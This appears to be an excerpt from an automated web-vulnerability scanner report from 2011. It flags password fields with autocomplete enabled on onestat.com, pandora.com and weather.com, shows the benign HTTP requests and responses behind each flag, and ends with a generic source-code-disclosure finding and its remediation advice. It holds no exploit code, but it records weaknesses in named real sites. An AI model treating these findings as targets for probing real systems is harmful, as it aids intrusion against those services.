The form contains the following password field with autocomplete enabled:
MemberLoginCompact1$Login1$Password
Request
GET / HTTP/1.1
Host: www.onestat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 02:31:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wdsxsqfwe5o3umirakad3355; path=/; HttpOnly
Set-Cookie: UILanguage=en; expires=Sat, 09-Jan-2016 02:31:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> OneStat.com We ...[SNIP]... <div class="container"> <form name="form1" method="post" action="Default.aspx" id="form1"> <div> ...[SNIP]... <td><input name="MemberLoginCompact1$Login1$Password" type="password" id="MemberLoginCompact1_Login1_Password" class="login" /></td> ...[SNIP]...
The page contains a form with the following action URL:
https://www.pandora.com/login.vm
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /people/ HTTP/1.1
Host: www.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:20:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 13116
<html>
<head>
<title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/48617 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/48858 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/48879 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL:
https://registration.weather.com/ursa/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /weather/local/USMI0020 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The application appears to disclose some server-side source code written in PHP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.